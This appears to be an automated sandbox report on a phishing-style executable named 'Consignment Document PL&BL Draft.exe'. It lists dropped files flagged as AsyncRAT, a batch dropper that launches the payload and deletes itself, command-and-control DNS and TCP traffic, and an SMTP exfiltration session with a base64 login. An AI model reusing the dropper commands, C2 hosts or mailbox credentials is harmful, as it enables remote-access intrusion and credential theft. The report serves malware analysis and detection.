Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._................................. ... ....@.. .......................`............@.................................t...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........................"..0...........................................Z(.....(....s....(....z.,..{....,..{....o......(......s....}......(.....r...po............s....(....6.(.....(........0..W.......(....r...p(.......(....(....(.....(....&(....r%..p(.......(....(....(.....(....&.( .....0..X........s!......$........o"...&..(#......s$......$..........o"...&.......,..o......,..o.............(..A..........DK........((....0..2.......~........., rE..p.....()...o...s+......

C:\Users\user\AppData\Local\Temp\VLC2.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\Isgeprf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46080
Entropy (8bit):	5.460481307882583
Encrypted:	false
SSDEEP:	768:HuOe1TXQpMlWUlr7e+fmo2qDWL5P0NFUTpYkk8PIvzjbpgX3iQ2/bcGA8+gulCsN:HuOe1TXOw2BLs7Bv3bmXSQk9/Wdjx
MD5:	E2DA4F42475E01F7961EF2FB929DE54E
SHA1:	E57DF765DA7135D578B29E4619CC395A729EB757
SHA-256:	488C59FDDF2DB00DA7FB4D6589183ADC7396EDC4233F23EB950AA7191FE4366E
SHA-512:	08CF988BE2B1D4214812477759BF273E1281D762491D5EB40ED77C95AD701A08FCE0D5A67B7D2163389E0EFA96422DD535D1062ECB345AC6054688E38EB6E2A0
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\VLC2.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 86%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#..^............................>.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........Y...l.............................................................V..;...$0.xC.=VD..b......9A../.\.....(.....~............~............~............~............~............~............~............~.....~............~............~............(>......2~.....o?....s..........()...:(...(...:....(+...:....('...:....((...9.....(v...V(....s.... ...o....n~....9....~....o..........~~....(....9....(0...9....(@...Vr.%.p~....(o....#....s...

C:\Users\user\AppData\Local\Temp\tmpA04.tmp.bat Download File
Process:	C:\Users\user\AppData\Local\Temp\Isgeprf.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	150
Entropy (8bit):	5.043804988414281
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5oWXp5cViE2J5xAIddiovmqRDWXp5cViE2J5xAInTRIOVRLazVZ6:hWKqTtT6WXp+N23ffLvmq1WXp+N23fT9
MD5:	388EB945DAD3F52CC1817A1F7A40D910
SHA1:	F71A000719329DF48C5672DB1B4DB87C61CF6CCA
SHA-256:	6C6808B0EAE57E429BB83B08AC62823A80BBC699D203C8B07798AE1C3E1CC11E
SHA-512:	B21A73C4BBE96E9957DA9EA029446B6FA8664CAAFD776587B4E08C7BD595C8228D593B24395DEA2C2EA9895D78F87F69AEF029400A34F39BD3886B94FC962B17
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Local\Temp\VLC2.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpA04.tmp.bat" /f /q..

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Users\user\AppData\Local\Temp\Icda.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:RaD:I
MD5:	01962885EF8F2FE70BB19B7042C8445C
SHA1:	1576FDFFCDE15A2C54BDF910C8ED8247E4B733FC
SHA-256:	C5400085BB865B92096703DF51D7688EEBC03DF6103E70C8C57520FC020BA348
SHA-512:	36A81CE9C4B31BA31249AAB23AE18DD38A078C435DAFF2CB378B063246237F32E45072C6DF48387A63C2ECF8890A9B0CE4F32011720E814BB19D352690BC263B
Malicious:	true
Preview:	.5=?...H

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.717996960469375
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Consignment Document PL&BL Draft.exe
File size:	700416
MD5:	b70ffeb2babbacb28b22411beccb4642
SHA1:	3c096e92894c9ff7bfae0fcc0ce5f250cb4ebe9f
SHA256:	623d707cab5c5dc378a5100018e29f88949f4ea4be4b34cc2fc36e1612b68100
SHA512:	79471594362dcb6f5ecbddb34ce68ddbbfc2320fa088439a54a0dfba7c878d32e5715366808b7a7399f33c9b992e6ebac75d90d9cdc5d591b42e480f4874db41
SSDEEP:	12288:C2HV0CAO/8tsaZm/VGGNO332QplXGJi2o3TnCaR:C2HYBVm/MGillXe3szCa
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....x._..............0.............B<... ...@....@.. ....................................@................................

File Icon


Icon Hash:	e0f4f4dcd8dcccf0

Static PE Info

General
Entrypoint:	0x493c42
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FC87881 [Thu Dec 3 05:32:49 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x93bf0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x94000	0x18c2c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xae000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x91c48	0x91e00	False	0.896303623072	data	7.86672838882	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x94000	0x18c2c	0x18e00	False	0.321823963568	data	5.63415026876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xae000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x941f0	0x468	GLS_BINARY_LSB_FIRST
RT_ICON	0x94658	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON	0x98880	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 967405405, next used block 141717609
RT_ICON	0x99928	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON	0x9bed0	0x10828	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0xac6f8	0x4c	data
RT_VERSION	0xac744	0x2fc	data
RT_MANIFEST	0xaca40	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright
Assembly Version	2.0.0.0
InternalName	p.exe
FileVersion	2.0.0.0
CompanyName	Microsoft
LegalTrademarks
Comments
ProductName	Pet Pamonha
ProductVersion	2.0.0.0
FileDescription	Pet Pamonha
OriginalFilename	p.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
12/03/20-09:32:57.327796	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49739	587	192.168.2.3	85.187.154.178

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 09:31:21.121231079 CET	49709	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:24.159626961 CET	49709	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:30.269514084 CET	49709	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:37.690541029 CET	49715	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:40.723503113 CET	49715	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:42.994376898 CET	49716	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:45.995290041 CET	49716	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:46.724054098 CET	49715	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:31:52.005683899 CET	49716	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:01.321712971 CET	49719	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:04.074192047 CET	49720	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:04.334855080 CET	49719	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:07.085100889 CET	49720	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:10.335376024 CET	49719	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:13.101190090 CET	49720	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:18.594408035 CET	49729	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:21.602077007 CET	49729	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:27.618124008 CET	49729	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:30.448883057 CET	49731	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:33.462311983 CET	49731	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:35.880191088 CET	49732	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:38.884655952 CET	49732	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:39.462771893 CET	49731	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:44.900799990 CET	49732	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:55.008579016 CET	49737	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:56.842206955 CET	49738	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:56.865803003 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:56.902061939 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:56.902169943 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.059776068 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.060077906 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.096456051 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.097995996 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.134474993 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.136959076 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.178388119 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.203146935 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.239535093 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.239850998 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.287650108 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.287950993 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.324184895 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.324232101 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.327795982 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.328111887 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.328252077 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.328385115 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:57.364470005 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.364510059 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.367136002 CET	587	49739	85.187.154.178	192.168.2.3
Dec 3, 2020 09:32:57.417382002 CET	49739	587	192.168.2.3	85.187.154.178
Dec 3, 2020 09:32:58.011385918 CET	49737	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:32:59.855140924 CET	49738	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:33:04.027350903 CET	49737	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:33:05.855571032 CET	49738	5500	192.168.2.3	172.94.25.202
Dec 3, 2020 09:33:12.319056988 CET	49740	5550	192.168.2.3	172.94.25.202
Dec 3, 2020 09:33:15.325206041 CET	49740	5550	192.168.2.3	172.94.25.202

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 3, 2020 09:31:19.367966890 CET	57544	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:19.395359039 CET	53	57544	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:20.564963102 CET	55984	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:20.836836100 CET	53	55984	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:21.017959118 CET	64185	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:21.045104980 CET	53	64185	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:30.495255947 CET	65110	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:30.522387981 CET	53	65110	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:30.864052057 CET	58361	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:30.903857946 CET	53	58361	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:37.422287941 CET	63492	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:37.681651115 CET	53	63492	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:42.682965994 CET	60831	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:42.943188906 CET	53	60831	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:52.311958075 CET	60100	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:52.338975906 CET	53	60100	8.8.8.8	192.168.2.3
Dec 3, 2020 09:31:52.817423105 CET	53195	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:31:52.860649109 CET	53	53195	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:01.058284998 CET	50141	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:01.317799091 CET	53	50141	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:03.798532009 CET	53023	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:04.072484016 CET	53	53023	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:05.174170971 CET	49563	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:05.201227903 CET	53	49563	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:09.620980024 CET	51352	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:09.666882038 CET	53	51352	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:18.332866907 CET	59349	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:18.592967987 CET	53	59349	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:22.460119963 CET	57084	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:22.487194061 CET	53	57084	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:30.188091040 CET	58823	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:30.446818113 CET	53	58823	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:35.584728003 CET	57568	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:35.857040882 CET	53	57568	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:39.679889917 CET	50540	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:39.715394020 CET	53	50540	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:41.620759010 CET	54366	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:41.648091078 CET	53	54366	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:42.002161980 CET	53034	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:42.037940025 CET	53	53034	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:49.804671049 CET	57762	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:49.831701040 CET	53	57762	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:54.726667881 CET	55435	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:54.986386061 CET	53	55435	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:56.548016071 CET	50713	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:56.567727089 CET	56132	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:56.626704931 CET	53	50713	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:56.640607119 CET	58987	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:32:56.840656042 CET	53	56132	8.8.8.8	192.168.2.3
Dec 3, 2020 09:32:56.850773096 CET	53	58987	8.8.8.8	192.168.2.3
Dec 3, 2020 09:33:12.045288086 CET	56579	53	192.168.2.3	8.8.8.8
Dec 3, 2020 09:33:12.318238020 CET	53	56579	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 3, 2020 09:31:20.564963102 CET	192.168.2.3	8.8.8.8	0x6798	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:31:37.422287941 CET	192.168.2.3	8.8.8.8	0x3563	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:31:42.682965994 CET	192.168.2.3	8.8.8.8	0xe3b3	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:01.058284998 CET	192.168.2.3	8.8.8.8	0x40db	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:03.798532009 CET	192.168.2.3	8.8.8.8	0x8985	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:18.332866907 CET	192.168.2.3	8.8.8.8	0x14b7	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:30.188091040 CET	192.168.2.3	8.8.8.8	0x132e	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:35.584728003 CET	192.168.2.3	8.8.8.8	0x437f	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:54.726667881 CET	192.168.2.3	8.8.8.8	0xac3a	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:56.548016071 CET	192.168.2.3	8.8.8.8	0xe037	Standard query (0)	mail.flood-protection.org	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:56.567727089 CET	192.168.2.3	8.8.8.8	0x23c3	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:56.640607119 CET	192.168.2.3	8.8.8.8	0x85cc	Standard query (0)	mail.flood-protection.org	A (IP address)	IN (0x0001)
Dec 3, 2020 09:33:12.045288086 CET	192.168.2.3	8.8.8.8	0x314a	Standard query (0)	centurygift.myq-see.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 3, 2020 09:31:20.836836100 CET	8.8.8.8	192.168.2.3	0x6798	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:31:37.681651115 CET	8.8.8.8	192.168.2.3	0x3563	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:31:42.943188906 CET	8.8.8.8	192.168.2.3	0xe3b3	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:01.317799091 CET	8.8.8.8	192.168.2.3	0x40db	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:04.072484016 CET	8.8.8.8	192.168.2.3	0x8985	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:18.592967987 CET	8.8.8.8	192.168.2.3	0x14b7	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:30.446818113 CET	8.8.8.8	192.168.2.3	0x132e	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:35.857040882 CET	8.8.8.8	192.168.2.3	0x437f	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:54.986386061 CET	8.8.8.8	192.168.2.3	0xac3a	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:56.626704931 CET	8.8.8.8	192.168.2.3	0xe037	No error (0)	mail.flood-protection.org	flood-protection.org		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2020 09:32:56.626704931 CET	8.8.8.8	192.168.2.3	0xe037	No error (0)	flood-protection.org		85.187.154.178	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:56.840656042 CET	8.8.8.8	192.168.2.3	0x23c3	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)
Dec 3, 2020 09:32:56.850773096 CET	8.8.8.8	192.168.2.3	0x85cc	No error (0)	mail.flood-protection.org	flood-protection.org		CNAME (Canonical name)	IN (0x0001)
Dec 3, 2020 09:32:56.850773096 CET	8.8.8.8	192.168.2.3	0x85cc	No error (0)	flood-protection.org		85.187.154.178	A (IP address)	IN (0x0001)
Dec 3, 2020 09:33:12.318238020 CET	8.8.8.8	192.168.2.3	0x314a	No error (0)	centurygift.myq-see.com		172.94.25.202	A (IP address)	IN (0x0001)

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Dec 3, 2020 09:32:57.059776068 CET	587	49739	85.187.154.178	192.168.2.3	220-nl1-ss12.a2hosting.com ESMTP Exim 4.93 #2 Thu, 03 Dec 2020 09:32:57 +0100 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Dec 3, 2020 09:32:57.060077906 CET	49739	587	192.168.2.3	85.187.154.178	EHLO 093954
Dec 3, 2020 09:32:57.096456051 CET	587	49739	85.187.154.178	192.168.2.3	250-nl1-ss12.a2hosting.com Hello 093954 [84.17.52.25] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Dec 3, 2020 09:32:57.097995996 CET	49739	587	192.168.2.3	85.187.154.178	AUTH login c2VudEBmbG9vZC1wcm90ZWN0aW9uLm9yZw==
Dec 3, 2020 09:32:57.134474993 CET	587	49739	85.187.154.178	192.168.2.3	334 UGFzc3dvcmQ6
Dec 3, 2020 09:32:57.178388119 CET	587	49739	85.187.154.178	192.168.2.3	235 Authentication succeeded
Dec 3, 2020 09:32:57.203146935 CET	49739	587	192.168.2.3	85.187.154.178	MAIL FROM:<sent@flood-protection.org>
Dec 3, 2020 09:32:57.239535093 CET	587	49739	85.187.154.178	192.168.2.3	250 OK
Dec 3, 2020 09:32:57.239850998 CET	49739	587	192.168.2.3	85.187.154.178	RCPT TO:<mebarth@flood-protection.org>
Dec 3, 2020 09:32:57.287650108 CET	587	49739	85.187.154.178	192.168.2.3	250 Accepted
Dec 3, 2020 09:32:57.287950993 CET	49739	587	192.168.2.3	85.187.154.178	DATA
Dec 3, 2020 09:32:57.324232101 CET	587	49739	85.187.154.178	192.168.2.3	354 Enter message, ending with "." on a line by itself
Dec 3, 2020 09:32:57.328385115 CET	49739	587	192.168.2.3	85.187.154.178	.
Dec 3, 2020 09:32:57.367136002 CET	587	49739	85.187.154.178	192.168.2.3	250 OK id=1kkk2r-0000fT-9t

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Consignment Document PL&BL Draft.exe PID: 6620 Parent PID: 5644

General

Start time:	09:31:07
Start date:	03/12/2020
Path:	C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Consignment Document PL&BL Draft.exe'
Imagebase:	0xba0000
File size:	700416 bytes
MD5 hash:	B70FFEB2BABBACB28B22411BECCB4642
Has elevated privileges:	true
